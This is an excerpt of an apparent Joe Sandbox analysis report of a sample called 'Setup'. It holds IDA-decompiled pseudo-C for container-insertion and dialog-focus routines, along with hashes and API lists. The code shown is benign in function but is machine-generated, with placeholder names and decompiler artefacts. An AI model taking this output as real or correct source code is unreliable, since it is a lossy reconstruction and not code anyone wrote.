                                                                                                                                                              • Instruction ID: 2c4a320b3958d148fafe5ac47a3fe145740335362e9ed150bb876a8542427f4e
                                                                                                                                                              • Opcode Fuzzy Hash: 674a9958b9a5c9a5cb453f160200f63fe660729ab341863490913925c6397475
                                                                                                                                                              • Instruction Fuzzy Hash: 8A5194B5D04108BFCB04DF95D891EEF77BAAF98304F14806EF40AA7242DA34AA45CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00431600(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				signed int _v5;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v21;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v33;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v41;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v49;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				char* _t66;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				void* _t95;
                                                                                                                                                              				void* _t96;
                                                                                                                                                              				intOrPtr* _t98;
                                                                                                                                                              				intOrPtr* _t101;
                                                                                                                                                              				void* _t142;
                                                                                                                                                              				void* _t143;
                                                                                                                                                              				void* _t147;
                                                                                                                                                              
                                                                                                                                                              				_v56 = __ecx;
                                                                                                                                                              				_v16 =  *((intOrPtr*)(E0041D410(_v56)));
                                                                                                                                                              				_v12 =  *((intOrPtr*)(_v56 + 4));
                                                                                                                                                              				_v5 = 1;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t66 = E00408710(_v16);
                                                                                                                                                              					_t143 = _t142 + 4;
                                                                                                                                                              					_t149 =  *_t66;
                                                                                                                                                              					if( *_t66 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_v12 = _v16;
                                                                                                                                                              					_t95 = E00436060(_t149, _v16);
                                                                                                                                                              					_t96 = E00415110(_a8);
                                                                                                                                                              					_t147 = _t143 + 8;
                                                                                                                                                              					_v5 = E0041CC50(_v56, _t96, _t95);
                                                                                                                                                              					if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                              						_t98 = E00441910(_v16);
                                                                                                                                                              						_t142 = _t147 + 4;
                                                                                                                                                              						_v60 =  *_t98;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t101 = E00415110(_v16);
                                                                                                                                                              						_t142 = _t147 + 4;
                                                                                                                                                              						_v60 =  *_t101;
                                                                                                                                                              					}
                                                                                                                                                              					_v16 = _v60;
                                                                                                                                                              				}
                                                                                                                                                              				__eflags = 0;
                                                                                                                                                              				if(0 == 0) {
                                                                                                                                                              					E00445360( &_v20, _v12);
                                                                                                                                                              					__eflags = _v5 & 0x000000ff;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						__eflags = E00444870( &_v20, E004083B0(_v56,  &_v32)) & 0x000000ff;
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							E00431E70( &_v20);
                                                                                                                                                              							L13:
                                                                                                                                                              							_t72 = E00415110(_a8);
                                                                                                                                                              							__eflags = E0041CC50(_v56, E00436060(__eflags, E0041D530( &_v20)), _t72) & 0x000000ff;
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								_v49 = 0;
                                                                                                                                                              								E00445E50(_a4,  &_v20,  &_v49);
                                                                                                                                                              								return _a4;
                                                                                                                                                              							}
                                                                                                                                                              							_v41 = 1;
                                                                                                                                                              							E00445E50(_a4, E00431A00(_v56, __eflags,  &_v48, _v5 & 0x000000ff, _v12, _a8),  &_v41);
                                                                                                                                                              							return _a4;
                                                                                                                                                              						}
                                                                                                                                                              						_v33 = 1;
                                                                                                                                                              						E00445E50(_a4, E00431A00(_v56, __eflags,  &_v40, 1, _v12, _a8),  &_v33);
                                                                                                                                                              						return _a4;
                                                                                                                                                              					}
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				_v21 = 1;
                                                                                                                                                              				E00445E50(_a4, E00431A00(_v56, 0,  &_v28, _v5 & 0x000000ff, _v12, _a8),  &_v21);
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initHandlestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3964502784-0
                                                                                                                                                              • Opcode ID: 63f6e11ae261600f7b0eadfe7e58b16e9400b1e535cce3b340d6ef79147bb440
                                                                                                                                                              • Instruction ID: 996a7f4a3a204697f120b1106b66c89e51c997d561b5141b1d18d575e8886a06
                                                                                                                                                              • Opcode Fuzzy Hash: 63f6e11ae261600f7b0eadfe7e58b16e9400b1e535cce3b340d6ef79147bb440
                                                                                                                                                              • Instruction Fuzzy Hash: 71516EB5D04108BFCB04DBD5D891EEFBBB9AF88304F14805EF406A7251DB38AA05CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0041C810(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				signed int _v5;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v21;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v33;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v41;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v49;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				char* _t66;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				void* _t95;
                                                                                                                                                              				void* _t96;
                                                                                                                                                              				intOrPtr* _t98;
                                                                                                                                                              				intOrPtr* _t101;
                                                                                                                                                              				void* _t142;
                                                                                                                                                              				void* _t143;
                                                                                                                                                              				void* _t147;
                                                                                                                                                              
                                                                                                                                                              				_v56 = __ecx;
                                                                                                                                                              				_v16 =  *((intOrPtr*)(E0041D410(_v56)));
                                                                                                                                                              				_v12 =  *((intOrPtr*)(_v56 + 4));
                                                                                                                                                              				_v5 = 1;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t66 = E0041CEF0(_v16);
                                                                                                                                                              					_t143 = _t142 + 4;
                                                                                                                                                              					_t149 =  *_t66;
                                                                                                                                                              					if( *_t66 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_v12 = _v16;
                                                                                                                                                              					_t95 = E00436060(_t149, _v16);
                                                                                                                                                              					_t96 = E00415110(_a8);
                                                                                                                                                              					_t147 = _t143 + 8;
                                                                                                                                                              					_v5 = E0041CC50(_v56, _t96, _t95);
                                                                                                                                                              					if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                              						_t98 = E00441910(_v16);
                                                                                                                                                              						_t142 = _t147 + 4;
                                                                                                                                                              						_v60 =  *_t98;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t101 = E00415110(_v16);
                                                                                                                                                              						_t142 = _t147 + 4;
                                                                                                                                                              						_v60 =  *_t101;
                                                                                                                                                              					}
                                                                                                                                                              					_v16 = _v60;
                                                                                                                                                              				}
                                                                                                                                                              				__eflags = 0;
                                                                                                                                                              				if(0 == 0) {
                                                                                                                                                              					E00445360( &_v20, _v12);
                                                                                                                                                              					__eflags = _v5 & 0x000000ff;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						__eflags = E00444870( &_v20, E004083B0(_v56,  &_v32)) & 0x000000ff;
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							E0041D4F0( &_v20);
                                                                                                                                                              							L13:
                                                                                                                                                              							_t72 = E00415110(_a8);
                                                                                                                                                              							__eflags = E0041CC50(_v56, E00436060(__eflags, E0041D530( &_v20)), _t72) & 0x000000ff;
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								_v49 = 0;
                                                                                                                                                              								E00445E50(_a4,  &_v20,  &_v49);
                                                                                                                                                              								return _a4;
                                                                                                                                                              							}
                                                                                                                                                              							_v41 = 1;
                                                                                                                                                              							E00445E50(_a4, E0041CFA0(_v56, __eflags,  &_v48, _v5 & 0x000000ff, _v12, _a8),  &_v41);
                                                                                                                                                              							return _a4;
                                                                                                                                                              						}
                                                                                                                                                              						_v33 = 1;
                                                                                                                                                              						E00445E50(_a4, E0041CFA0(_v56, __eflags,  &_v40, 1, _v12, _a8),  &_v33);
                                                                                                                                                              						return _a4;
                                                                                                                                                              					}
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				_v21 = 1;
                                                                                                                                                              				E00445E50(_a4, E0041CFA0(_v56, 0,  &_v28, _v5 & 0x000000ff, _v12, _a8),  &_v21);
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}
                                                                                                                                                              0x0041c975
                                                                                                                                                              0x0041c977
                                                                                                                                                              0x0041c9aa
                                                                                                                                                              0x0041c9b9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041c9be
                                                                                                                                                              0x0041c979
                                                                                                                                                              0x0041c99e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041c9a3
                                                                                                                                                              0x0041c912
                                                                                                                                                              0x0041c934
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041c939
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041c8f4
                                                                                                                                                              0x0041c8a9
                                                                                                                                                              0x0041c8ce
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initHandlestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3964502784-0
                                                                                                                                                              • Opcode ID: 053cb36615b50c11b9affa81ef5e7e281e4dcdacd00ba29a504b599901895e19
                                                                                                                                                              • Instruction ID: 2d2d5e5912a5e220dfae65aaf11e39b30c8cc877763405f5282d199abf3413ee
                                                                                                                                                              • Opcode Fuzzy Hash: 053cb36615b50c11b9affa81ef5e7e281e4dcdacd00ba29a504b599901895e19
                                                                                                                                                              • Instruction Fuzzy Hash: D75133B5D04108BFDB04DFD5DC91AEFBBB9AF88304F14805EF409A7241DA35AA45CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0042AE40(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				signed int _v5;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v21;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v33;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v41;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v49;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				char* _t66;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				void* _t95;
                                                                                                                                                              				void* _t96;
                                                                                                                                                              				intOrPtr* _t98;
                                                                                                                                                              				intOrPtr* _t101;
                                                                                                                                                              				void* _t142;
                                                                                                                                                              				void* _t143;
                                                                                                                                                              				void* _t147;
                                                                                                                                                              
                                                                                                                                                              				_v56 = __ecx;
                                                                                                                                                              				_v16 =  *((intOrPtr*)(E0041D410(_v56)));
                                                                                                                                                              				_v12 =  *((intOrPtr*)(_v56 + 4));
                                                                                                                                                              				_v5 = 1;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t66 = E0043F400(_v16);
                                                                                                                                                              					_t143 = _t142 + 4;
                                                                                                                                                              					_t149 =  *_t66;
                                                                                                                                                              					if( *_t66 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_v12 = _v16;
                                                                                                                                                              					_t95 = E00436060(_t149, _v16);
                                                                                                                                                              					_t96 = E00415110(_a8);
                                                                                                                                                              					_t147 = _t143 + 8;
                                                                                                                                                              					_v5 = E00420AA0(_v56, _t96, _t95);
                                                                                                                                                              					if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                              						_t98 = E00441910(_v16);
                                                                                                                                                              						_t142 = _t147 + 4;
                                                                                                                                                              						_v60 =  *_t98;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t101 = E00415110(_v16);
                                                                                                                                                              						_t142 = _t147 + 4;
                                                                                                                                                              						_v60 =  *_t101;
                                                                                                                                                              					}
                                                                                                                                                              					_v16 = _v60;
                                                                                                                                                              				}
                                                                                                                                                              				__eflags = 0;
                                                                                                                                                              				if(0 == 0) {
                                                                                                                                                              					E00445360( &_v20, _v12);
                                                                                                                                                              					__eflags = _v5 & 0x000000ff;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						__eflags = E00444870( &_v20, E004083B0(_v56,  &_v32)) & 0x000000ff;
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							E0043B320( &_v20);
                                                                                                                                                              							L13:
                                                                                                                                                              							_t72 = E00415110(_a8);
                                                                                                                                                              							__eflags = E00420AA0(_v56, E00436060(__eflags, E0041D530( &_v20)), _t72) & 0x000000ff;
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								_v49 = 0;
                                                                                                                                                              								E00445E50(_a4,  &_v20,  &_v49);
                                                                                                                                                              								return _a4;
                                                                                                                                                              							}
                                                                                                                                                              							_v41 = 1;
                                                                                                                                                              							E00445E50(_a4, E0042B200(_v56, __eflags,  &_v48, _v5 & 0x000000ff, _v12, _a8),  &_v41);
                                                                                                                                                              							return _a4;
                                                                                                                                                              						}
                                                                                                                                                              						_v33 = 1;
                                                                                                                                                              						E00445E50(_a4, E0042B200(_v56, __eflags,  &_v40, 1, _v12, _a8),  &_v33);
                                                                                                                                                              						return _a4;
                                                                                                                                                              					}
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				_v21 = 1;
                                                                                                                                                              				E00445E50(_a4, E0042B200(_v56, 0,  &_v28, _v5 & 0x000000ff, _v12, _a8),  &_v21);
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}


























                                                                                                                                                              0x0042af24
                                                                                                                                                              0x0042aed9
                                                                                                                                                              0x0042aefe
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initHandlestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3964502784-0
                                                                                                                                                              • Opcode ID: 52a222c8b7323ebc3dd8ca1e3ca17d3fefcf9e748fa0fa7ff610bb1d419f37ed
                                                                                                                                                              • Instruction ID: fac1375bb57e625ba080fb7128a1a8b3c9b784a227bf72c1a346f58f0427bc84
                                                                                                                                                              • Opcode Fuzzy Hash: 52a222c8b7323ebc3dd8ca1e3ca17d3fefcf9e748fa0fa7ff610bb1d419f37ed
                                                                                                                                                              • Instruction Fuzzy Hash: 6D5193B5E04118BFCB04DB95D891EEFB7B9AF98304F50805EF406A7241DB38AA05CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                              			E0040BE70(intOrPtr* __ecx, intOrPtr* _a16) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				intOrPtr* _v24;
                                                                                                                                                              				intOrPtr* _v28;
                                                                                                                                                              				intOrPtr* _v32;
                                                                                                                                                              				signed int _t43;
                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				intOrPtr _t58;
                                                                                                                                                              				signed int _t115;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x513ff8);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t43 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t43 ^ _t115);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v24 = __ecx;
                                                                                                                                                              				 *(_v24 + 0x98) =  *(_v24 + 0x98) | 0x00000020;
                                                                                                                                                              				_t47 = _v24;
                                                                                                                                                              				_t118 =  *(_t47 + 0x98) >> 0x00000006 & 0x00000001;
                                                                                                                                                              				if(( *(_t47 + 0x98) >> 0x00000006 & 0x00000001) != 0) {
                                                                                                                                                              					L10:
                                                                                                                                                              					 *_a16 = 0;
                                                                                                                                                              					 *[fs:0x0] = _v16;
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				if((E00430370(_v24 + 0x64, _t118, 0) & 0x000000ff) == 0) {
                                                                                                                                                              					L6:
                                                                                                                                                              					if(( *(_v24 + 0x98) >> 0x00000003 & 0x00000001) == 0) {
                                                                                                                                                              						_t53 = E0040BE50(_v24 + 4, GetFocus());
                                                                                                                                                              						__eflags = _t53;
                                                                                                                                                              						if(_t53 == 0) {
                                                                                                                                                              							SetFocus(GetWindow( *(_v24 + 4), 5));
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						SetFocus( *(_v24 + 4));
                                                                                                                                                              					}
                                                                                                                                                              					goto L10;
                                                                                                                                                              				}
                                                                                                                                                              				_t58 = _v24;
                                                                                                                                                              				_t120 =  *(_t58 + 0x98) >> 0x00000001 & 0x00000001;
                                                                                                                                                              				if(( *(_t58 + 0x98) >> 0x00000001 & 0x00000001) != 0) {
                                                                                                                                                              					goto L6;
                                                                                                                                                              				}
                                                                                                                                                              				E00414C90();
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v28 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x10))))();
                                                                                                                                                              				 *((intOrPtr*)( *((intOrPtr*)( *_v28))))(_v28, 0x51da8c, E00434050( &_v20));
                                                                                                                                                              				if((E00430370( &_v20, _t120, 0) & 0x000000ff) != 0) {
                                                                                                                                                              					_v32 = E0041D530(_v24 + 0x64);
                                                                                                                                                              					 *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x2c))))(_v32, 0xfffffffc, 0, E0041D530( &_v20), 0,  *(_v24 + 4), _v24 + 0xb4);
                                                                                                                                                              				}
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E0040D320();
                                                                                                                                                              				goto L6;
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              • SetFocus.USER32(?,00000000,DDD124F9,00000000,00000000,?,DDD124F9), ref: 0040BF9C
                                                                                                                                                              • GetFocus.USER32 ref: 0040BFA4
                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 0040BFC3
                                                                                                                                                              • SetFocus.USER32(00000000), ref: 0040BFCA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Focus$Window
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3286522332-0
                                                                                                                                                              • Opcode ID: 970ddb0cfd7bd0c14a3f2e369824521eca09491f84e662d54869847b4cf92b83
                                                                                                                                                              • Instruction ID: 3a94e24fefa496a51dce265a90df239404a5a80031a59ee7eb99bbd9718925be
                                                                                                                                                              • Opcode Fuzzy Hash: 970ddb0cfd7bd0c14a3f2e369824521eca09491f84e662d54869847b4cf92b83
                                                                                                                                                              • Instruction Fuzzy Hash: 5A414BB4A001069FDB08DF99D991BBFB3B5FF49300F108169E516AB391DB34AD00CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                              			E0049C540(intOrPtr __ecx, void* __edx, struct HWND__* _a4, int _a8, intOrPtr _a12, struct HWND__* _a16, int _a20, intOrPtr _a24) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				signed char _v25;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				char _v60;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				struct HWND__* _v68;
                                                                                                                                                              				char _v73;
                                                                                                                                                              				long _v80;
                                                                                                                                                              				long _v84;
                                                                                                                                                              				int _v88;
                                                                                                                                                              				intOrPtr _v96;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				signed int _t45;
                                                                                                                                                              				signed int _t46;
                                                                                                                                                              				signed int _t53;
                                                                                                                                                              				WCHAR* _t58;
                                                                                                                                                              				long _t61;
                                                                                                                                                              				intOrPtr _t69;
                                                                                                                                                              				intOrPtr _t92;
                                                                                                                                                              				intOrPtr _t94;
                                                                                                                                                              				signed int _t95;
                                                                                                                                                              				void* _t96;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50b21a);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_t45 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t46 = _t45 ^ _t95;
                                                                                                                                                              				_v32 = _t46;
                                                                                                                                                              				_push(_t46);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t96 - 0x4c;
                                                                                                                                                              				_v96 = __ecx;
                                                                                                                                                              				_v24 = 0xffffffff;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E004175C0(E00434050( &_v73));
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				if(_a8 != 0xffffffff) {
                                                                                                                                                              					_v68 = GetDlgItem(_a4, _a8);
                                                                                                                                                              				} else {
                                                                                                                                                              					_v68 = _a4;
                                                                                                                                                              				}
                                                                                                                                                              				if(_v68 != 0) {
                                                                                                                                                              					_t89 = _a16;
                                                                                                                                                              					_t53 = E0049C190(_v96, _a16, _a12, _a16,  &_v64, 0, _a24);
                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                              					_v25 =  ~( ~_t53);
                                                                                                                                                              					if((_v25 & 0x000000ff) != 0) {
                                                                                                                                                              						if(_a20 == 0) {
                                                                                                                                                              							SendMessageW(_v68, 0x30, E0042E0E0(0x5c1160), 0);
                                                                                                                                                              						} else {
                                                                                                                                                              							SendMessageW(_v68, 0x30, _a20, 0);
                                                                                                                                                              						}
                                                                                                                                                              						_t58 = E00416A30( &_v60);
                                                                                                                                                              						_t89 = _v68;
                                                                                                                                                              						_v88 = SetWindowTextW(_v68, _t58);
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						_t61 = _v88;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v84 = 0;
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						_t61 = _v84;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_v80 = 0;
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					_t61 = _v80;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				_pop(_t92);
                                                                                                                                                              				_pop(_t94);
                                                                                                                                                              				_pop(_t69);
                                                                                                                                                              				return E0044F6C8(_t61, _t69, _v32 ^ _t95, _t89, _t92, _t94);
                                                                                                                                                              			}































                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 0049C5AB
                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0049C62D
                                                                                                                                                              • SetWindowTextW.USER32(00000000,00000000), ref: 0049C65B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemMessageSendTextWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1298124448-0
                                                                                                                                                              • Opcode ID: 4d35edf563f70e0af3eef84d4ba23a6c57d4ed4c1c8e931ed56335222567eb40
